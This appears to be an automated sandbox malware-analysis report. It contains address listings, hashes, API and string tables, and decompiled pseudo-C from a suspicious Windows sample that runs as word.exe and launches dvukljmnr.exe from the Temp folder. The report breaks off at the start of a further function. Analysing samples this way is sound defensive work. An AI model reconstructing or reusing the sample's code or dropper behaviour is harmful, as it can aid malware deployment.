                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x00000000
                                                          0x00000000
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b3
                                                          0x004063b6
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x00406392
                                                          0x00406395
                                                          0x00406398
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004063ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004063cf
                                                          0x004063d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004063d9
                                                          0x004063dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e3
                                                          0x004063e5
                                                          0x004063e9
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406440
                                                          0x00406444
                                                          0x0040644b
                                                          0x0040644e
                                                          0x00406451
                                                          0x0040645b
                                                          0x00000000
                                                          0x0040645b
                                                          0x00406446
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00406481
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x0040648a
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406494
                                                          0x00406499
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x00000000
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x00000000
                                                          0x004066ec
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
                                                          • Instruction ID: eeb6df0b4c754b004cb91f1e651764525fca86d3ed66ed31f7f656e6c0f0dc00
                                                          • Opcode Fuzzy Hash: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
                                                          • Instruction Fuzzy Hash: B7F17671D00269CBDF28CFA8C8946ADBBB0FF44305F25816ED856BB281D7385A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (function 4036a1; graph rendering omitted)
                                                          C-Code - Quality: 89%
                                                          			E004036A1() {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v8;
                                                          				int _v12;
                                                          				int _v16;
                                                          				char _v20;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t20;
                                                          				void* _t28;
                                                          				void* _t30;
                                                          				int _t31;
                                                          				void* _t34;
                                                          				struct HINSTANCE__* _t37;
                                                          				int _t38;
                                                          				int _t42;
                                                          				char _t61;
                                                          				CHAR* _t63;
                                                          				signed char _t67;
                                                          				CHAR* _t78;
                                                          				intOrPtr _t80;
                                                          				CHAR* _t84;
                                                          				CHAR* _t85;
                                                          
                                                          				_t80 =  *0x423f28;
                                                          				_t20 = E00405DDA(6);
                                                          				_t87 = _t20;
                                                          				if(_t20 == 0) {
                                                          					_t78 = 0x420530;
                                                          					"1033" = 0x7830;
                                                          					E004059DB(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420530, 0);
                                                          					__eflags =  *0x420530;
                                                          					if(__eflags == 0) {
                                                          						E004059DB(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072FE, 0x420530, 0);
                                                          					}
                                                          					lstrcatA("1033", _t78);
                                                          				} else {
                                                          					E00405A52("1033",  *_t20() & 0x0000ffff);
                                                          				}
                                                          				E00403955(_t75, _t87);
                                                          				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
                                                          				 *0x423fa0 =  *0x423f30 & 0x00000020;
                                                          				if(E004056C8(_t87, _t84) != 0) {
                                                          					L16:
                                                          					if(E004056C8(_t95, _t84) == 0) {
                                                          						_push( *((intOrPtr*)(_t80 + 0x118)));
                                                          						_push(_t84);
                                                          						E00405B16(0, _t78, _t80);
                                                          					}
                                                          					_t28 = LoadImageA( *0x423f20, 0x67, 1, 0, 0, 0x8040);
                                                          					 *0x423708 = _t28;
                                                          					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                          						L21:
                                                          						if(E0040140B(0) == 0) {
                                                          							_t30 = E00403955(_t75, __eflags);
                                                          							__eflags =  *0x423fc0;
                                                          							if( *0x423fc0 != 0) {
                                                          								_t31 = E00404F71(_t30, 0);
                                                          								__eflags = _t31;
                                                          								if(_t31 == 0) {
                                                          									E0040140B(1);
                                                          									goto L33;
                                                          								}
                                                          								__eflags =  *0x4236ec;
                                                          								if( *0x4236ec == 0) {
                                                          									E0040140B(2);
                                                          								}
                                                          								goto L22;
                                                          							}
                                                          							ShowWindow( *0x420508, 5); // executed
                                                          							_t37 = LoadLibraryA("RichEd20"); // executed
                                                          							__eflags = _t37;
                                                          							if(_t37 == 0) {
                                                          								LoadLibraryA("RichEd32");
                                                          							}
                                                          							_t85 = "RichEdit20A";
                                                          							_t38 = GetClassInfoA(0, _t85, 0x4236c0);
                                                          							__eflags = _t38;
                                                          							if(_t38 == 0) {
                                                          								GetClassInfoA(0, "RichEdit", 0x4236c0);
                                                          								 *0x4236e4 = _t85;
                                                          								RegisterClassA(0x4236c0);
                                                          							}
                                                          							_t42 = DialogBoxParamA( *0x423f20,  *0x423700 + 0x00000069 & 0x0000ffff, 0, E00403A22, 0); // executed
                                                          							E0040140B(5);
                                                          							return _t42;
                                                          						}
                                                          						L22:
                                                          						_t34 = 2;
                                                          						return _t34;
                                                          					} else {
                                                          						_t75 =  *0x423f20;
                                                          						 *0x4236d4 = _t28;
                                                          						_v20 = 0x624e5f;
                                                          						 *0x4236c4 = E00401000;
                                                          						 *0x4236d0 =  *0x423f20;
                                                          						 *0x4236e4 =  &_v20;
                                                          						if(RegisterClassA(0x4236c0) == 0) {
                                                          							L33:
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						_t12 =  &_v16; // 0x624e5f
                                                          						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                          						 *0x420508 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f20, 0);
                                                          						goto L21;
                                                          					}
                                                          				} else {
                                                          					_t75 =  *(_t80 + 0x48);
                                                          					if(_t75 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					_t78 = 0x422ec0;
                                                          					E004059DB( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423f58, 0x422ec0, 0);
                                                          					_t61 =  *0x422ec0; // 0x43
                                                          					if(_t61 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					if(_t61 == 0x22) {
                                                          						_t78 = 0x422ec1;
                                                          						 *((char*)(E00405612(0x422ec1, 0x22))) = 0;
                                                          					}
                                                          					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                          					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                                                          						L15:
                                                          						E00405AF4(_t84, E004055E7(_t78));
                                                          						goto L16;
                                                          					} else {
                                                          						_t67 = GetFileAttributesA(_t78);
                                                          						if(_t67 == 0xffffffff) {
                                                          							L14:
                                                          							E0040562E(_t78);
                                                          							goto L15;
                                                          						}
                                                          						_t95 = _t67 & 0x00000010;
                                                          						if((_t67 & 0x00000010) != 0) {
                                                          							goto L15;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                                                            • Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178), ref: 00405DF7
                                                            • Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405E08
                                                          • lstrcatA.KERNEL32(1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,C:\Users\user\AppData\Roaming\word.exe,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403712
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,?,?,?,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,C:\Users\user\AppData\Roaming\word.exe), ref: 0040377D
                                                          • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,?,?,?,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000), ref: 00403790
                                                          • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw), ref: 0040379B
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 004037E4
                                                            • Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F
                                                          • RegisterClassA.USER32 ref: 0040382B
                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403843
                                                          • CreateWindowExA.USER32 ref: 0040387C
                                                          • ShowWindow.USER32(00000005,00000000), ref: 004038AE
                                                          • LoadLibraryA.KERNEL32(RichEd20), ref: 004038BF
                                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004038CA
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,004236C0), ref: 004038DA
                                                          • GetClassInfoA.USER32(00000000,RichEdit,004236C0), ref: 004038E7
                                                          • RegisterClassA.USER32(004236C0), ref: 004038F0
                                                          • DialogBoxParamA.USER32 ref: 0040390F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw$C:\Users\user\AppData\Roaming\word.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 914957316-253077893
                                                          • Opcode ID: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
                                                          • Instruction ID: 396c3099e5e99d0af67321f2f40d51cf7d39f14f72ddbb9a737c40d3af2db82b
                                                          • Opcode Fuzzy Hash: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
                                                          • Instruction Fuzzy Hash: 5261C6B1704200BBD620AF61AD45F3B3ABDEB4474AB50447FF941B22E1D77CA9458A3E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00403A22(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                          				struct HWND__* _v32;
                                                          				void* _v80;
                                                          				void* _v84;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t35;
                                                          				signed int _t37;
                                                          				signed int _t39;
                                                          				struct HWND__* _t49;
                                                          				signed int _t67;
                                                          				struct HWND__* _t73;
                                                          				signed int _t86;
                                                          				struct HWND__* _t91;
                                                          				signed int _t99;
                                                          				int _t103;
                                                          				signed int _t115;
                                                          				signed int _t116;
                                                          				int _t117;
                                                          				signed int _t122;
                                                          				struct HWND__* _t125;
                                                          				struct HWND__* _t126;
                                                          				int _t127;
                                                          				long _t130;
                                                          				int _t132;
                                                          				int _t133;
                                                          				void* _t134;
                                                          				void* _t141;
                                                          
                                                          				_t115 = _a8;
                                                          				if(_t115 == 0x110 || _t115 == 0x408) {
                                                          					_t35 = _a12;
                                                          					_t125 = _a4;
                                                          					__eflags = _t115 - 0x110;
                                                          					 *0x420514 = _t35;
                                                          					if(_t115 == 0x110) {
                                                          						 *0x423f24 = _t125;
                                                          						 *0x420528 = GetDlgItem(_t125, 1);
                                                          						_t91 = GetDlgItem(_t125, 2);
                                                          						_push(0xffffffff);
                                                          						_push(0x1c);
                                                          						 *0x41f4f0 = _t91;
                                                          						E00403EF5(_t125);
                                                          						SetClassLongA(_t125, 0xfffffff2,  *0x423708);
                                                          						 *0x4236ec = E0040140B(4);
                                                          						_t35 = 1;
                                                          						__eflags = 1;
                                                          						 *0x420514 = 1;
                                                          					}
                                                          					_t122 =  *0x409238; // 0x0
                                                          					_t133 = 0;
                                                          					_t130 = (_t122 << 6) +  *0x423f40;
                                                          					__eflags = _t122;
                                                          					if(_t122 < 0) {
                                                          						L34:
                                                          						E00403F41(0x40b);
                                                          						while(1) {
                                                          							_t37 =  *0x420514;
                                                          							 *0x409238 =  *0x409238 + _t37;
                                                          							_t130 = _t130 + (_t37 << 6);
                                                          							_t39 =  *0x409238; // 0x0
                                                          							__eflags = _t39 -  *0x423f44;
                                                          							if(_t39 ==  *0x423f44) {
                                                          								E0040140B(1);
                                                          							}
                                                          							__eflags =  *0x4236ec - _t133;
                                                          							if( *0x4236ec != _t133) {
                                                          								break;
                                                          							}
                                                          							__eflags =  *0x409238 -  *0x423f44; // 0x0
                                                          							if(__eflags >= 0) {
                                                          								break;
                                                          							}
                                                          							_push( *((intOrPtr*)(_t130 + 0x24)));
                                                          							_t116 =  *(_t130 + 0x14);
                                                          							_push(0x42b800);
                                                          							E00405B16(_t116, _t125, _t130);
                                                          							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                          							_push(0xfffffc19);
                                                          							E00403EF5(_t125);
                                                          							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                          							_push(0xfffffc1b);
                                                          							E00403EF5(_t125);
                                                          							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                          							_push(0xfffffc1a);
                                                          							E00403EF5(_t125);
                                                          							_t49 = GetDlgItem(_t125, 3);
                                                          							__eflags =  *0x423fac - _t133;
                                                          							_v32 = _t49;
                                                          							if( *0x423fac != _t133) {
                                                          								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                          								__eflags = _t116;
                                                          							}
                                                          							ShowWindow(_t49, _t116 & 0x00000008);
                                                          							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                          							E00403F17(_t116 & 0x00000002);
                                                          							_t117 = _t116 & 0x00000004;
                                                          							EnableWindow( *0x41f4f0, _t117);
                                                          							__eflags = _t117 - _t133;
                                                          							if(_t117 == _t133) {
                                                          								_push(1);
                                                          							} else {
                                                          								_push(_t133);
                                                          							}
                                                          							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                          							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                          							__eflags =  *0x423fac - _t133;
                                                          							if( *0x423fac == _t133) {
                                                          								_push( *0x420528);
                                                          							} else {
                                                          								SendMessageA(_t125, 0x401, 2, _t133);
                                                          								_push( *0x41f4f0);
                                                          							}
                                                          							E00403F2A();
                                                          							E00405AF4(0x420530, 0x423720);
                                                          							_push( *((intOrPtr*)(_t130 + 0x18)));
                                                          							_push( &(0x420530[lstrlenA(0x420530)]));
                                                          							E00405B16(0x420530, _t125, _t130);
                                                          							SetWindowTextA(_t125, 0x420530);
                                                          							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)), _t133);
                                                          							__eflags = _t67;
                                                          							if(_t67 != 0) {
                                                          								continue;
                                                          							} else {
                                                          								__eflags =  *_t130 - _t133;
                                                          								if( *_t130 == _t133) {
                                                          									continue;
                                                          								}
                                                          								__eflags =  *(_t130 + 4) - 5;
                                                          								if( *(_t130 + 4) != 5) {
                                                          									DestroyWindow( *0x4236f8);
                                                          									 *0x41fd00 = _t130;
                                                          									__eflags =  *_t130 - _t133;
                                                          									if( *_t130 <= _t133) {
                                                          										goto L58;
                                                          									}
                                                          									_t73 = CreateDialogParamA( *0x423f20,  *_t130 +  *0x423700 & 0x0000ffff, _t125,  *( *(_t130 + 4) * 4 + "=@@"), _t130);
                                                          									__eflags = _t73 - _t133;
                                                          									 *0x4236f8 = _t73;
                                                          									if(_t73 == _t133) {
                                                          										goto L58;
                                                          									}
                                                          									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                          									_push(6);
                                                          									E00403EF5(_t73);
                                                          									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                          									ScreenToClient(_t125, _t134 + 0x10);
                                                          									SetWindowPos( *0x4236f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                          									E00401389( *((intOrPtr*)(_t130 + 0xc)), _t133);
                                                          									__eflags =  *0x4236ec - _t133;
                                                          									if( *0x4236ec != _t133) {
                                                          										goto L61;
                                                          									}
                                                          									ShowWindow( *0x4236f8, 8);
                                                          									E00403F41(0x405);
                                                          									goto L58;
                                                          								}
                                                          								__eflags =  *0x423fac - _t133;
                                                          								if( *0x423fac != _t133) {
                                                          									goto L61;
                                                          								}
                                                          								__eflags =  *0x423fa0 - _t133;
                                                          								if( *0x423fa0 != _t133) {
                                                          									continue;
                                                          								}
                                                          								goto L61;
                                                          							}
                                                          						}
                                                          						DestroyWindow( *0x4236f8); // executed
                                                          						 *0x423f24 = _t133;
                                                          						EndDialog(_t125,  *0x41f8f8);
                                                          						goto L58;
                                                          					} else {
                                                          						__eflags = _t35 - 1;
                                                          						if(_t35 != 1) {
                                                          							L33:
                                                          							__eflags =  *_t130 - _t133;
                                                          							if( *_t130 == _t133) {
                                                          								goto L61;
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)), 0);
                                                          						__eflags = _t86;
                                                          						if(_t86 == 0) {
                                                          							goto L33;
                                                          						}
                                                          						SendMessageA( *0x4236f8, 0x40f, 0, 1);
                                                          						__eflags =  *0x4236ec;
                                                          						return 0 |  *0x4236ec == 0x00000000;
                                                          					}
                                                          				} else {
                                                          					_t125 = _a4;
                                                          					_t133 = 0;
                                                          					if(_t115 == 0x47) {
                                                          						SetWindowPos( *0x420508, _t125, 0, 0, 0, 0, 0x13);
                                                          					}
                                                          					if(_t115 == 5) {
                                                          						asm("sbb eax, eax");
                                                          						ShowWindow( *0x420508,  ~(_a12 - 1) & _t115);
                                                          					}
                                                          					if(_t115 != 0x40d) {
                                                          						__eflags = _t115 - 0x11;
                                                          						if(_t115 != 0x11) {
                                                          							__eflags = _t115 - 0x111;
                                                          							if(_t115 != 0x111) {
                                                          								L26:
                                                          								return E00403F5C(_t115, _a12, _a16);
                                                          							}
                                                          							_t132 = _a12 & 0x0000ffff;
                                                          							_t126 = GetDlgItem(_t125, _t132);
                                                          							__eflags = _t126 - _t133;
                                                          							if(_t126 == _t133) {
                                                          								L13:
                                                          								__eflags = _t132 - 1;
                                                          								if(_t132 != 1) {
                                                          									__eflags = _t132 - 3;
                                                          									if(_t132 != 3) {
                                                          										_t127 = 2;
                                                          										__eflags = _t132 - _t127;
                                                          										if(_t132 != _t127) {
                                                          											L25:
                                                          											SendMessageA( *0x4236f8, 0x111, _a12, _a16);
                                                          											goto L26;
                                                          										}
                                                          										__eflags =  *0x423fac - _t133;
                                                          										if( *0x423fac == _t133) {
                                                          											_t99 = E0040140B(3);
                                                          											__eflags = _t99;
                                                          											if(_t99 != 0) {
                                                          												goto L26;
                                                          											}
                                                          											 *0x41f8f8 = 1;
                                                          											L21:
                                                          											_push(0x78);
                                                          											L22:
                                                          											E00403ECE();
                                                          											goto L26;
                                                          										}
                                                          										E0040140B(_t127);
                                                          										 *0x41f8f8 = _t127;
                                                          										goto L21;
                                                          									}
                                                          									__eflags =  *0x409238 - _t133; // 0x0
                                                          									if(__eflags <= 0) {
                                                          										goto L25;
                                                          									}
                                                          									_push(0xffffffff);
                                                          									goto L22;
                                                          								}
                                                          								_push(_t132);
                                                          								goto L22;
                                                          							}
                                                          							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                          							_t103 = IsWindowEnabled(_t126);
                                                          							__eflags = _t103;
                                                          							if(_t103 == 0) {
                                                          								goto L61;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						SetWindowLongA(_t125, _t133, _t133);
                                                          						return 1;
                                                          					} else {
                                                          						DestroyWindow( *0x4236f8);
                                                          						 *0x4236f8 = _a12;
                                                          						L58:
                                                          						_t141 =  *0x421530 - _t133; // 0x0
                                                          						if(_t141 == 0 &&  *0x4236f8 != _t133) {
                                                          							ShowWindow(_t125, 0xa);
                                                          							 *0x421530 = 1;
                                                          						}
                                                          						L61:
                                                          						return 0;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5E
                                                          • ShowWindow.USER32(?), ref: 00403A7B
                                                          • DestroyWindow.USER32 ref: 00403A8F
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AAB
                                                          • GetDlgItem.USER32(?,?), ref: 00403ACC
                                                          • SendMessageA.USER32 ref: 00403AE0
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403AE7
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403B95
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403B9F
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BB9
                                                          • SendMessageA.USER32 ref: 00403C0A
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403CB0
                                                          • ShowWindow.USER32(00000000,?), ref: 00403CD1
                                                          • EnableWindow.USER32(?,?), ref: 00403CE3
                                                          • EnableWindow.USER32(?,?), ref: 00403CFE
                                                          • GetSystemMenu.USER32 ref: 00403D14
                                                          • EnableMenuItem.USER32 ref: 00403D1B
                                                          • SendMessageA.USER32 ref: 00403D33
                                                          • SendMessageA.USER32 ref: 00403D46
                                                          • lstrlenA.KERNEL32(00420530,?,00420530,00423720), ref: 00403D6F
                                                          • SetWindowTextA.USER32(?,00420530), ref: 00403D7E
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403EB2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
                                                          • Instruction ID: a83dcc86622e640bdf6b153063aa13b6230d1eae5258657c65e28bef3e163658
                                                          • Opcode Fuzzy Hash: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
                                                          • Instruction Fuzzy Hash: E8C1D171A04205BBDB21AF21ED45D2B7EBCEB44706F50053EF601B12F1C779AA829B1E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          [Control-flow graph of the function at 00402C7D; legend: Executed / Not Executed]
                                                          C-Code - Quality: 96%
                                                          			E00402C7D(void* __eflags, signed int _a4) {
                                                          				struct HWND__* _v8;
                                                          				struct HWND__* _v12;
                                                          				struct HWND__* _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				long _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				intOrPtr _v44;
                                                          				signed int _v48;
                                                          				char _v308;
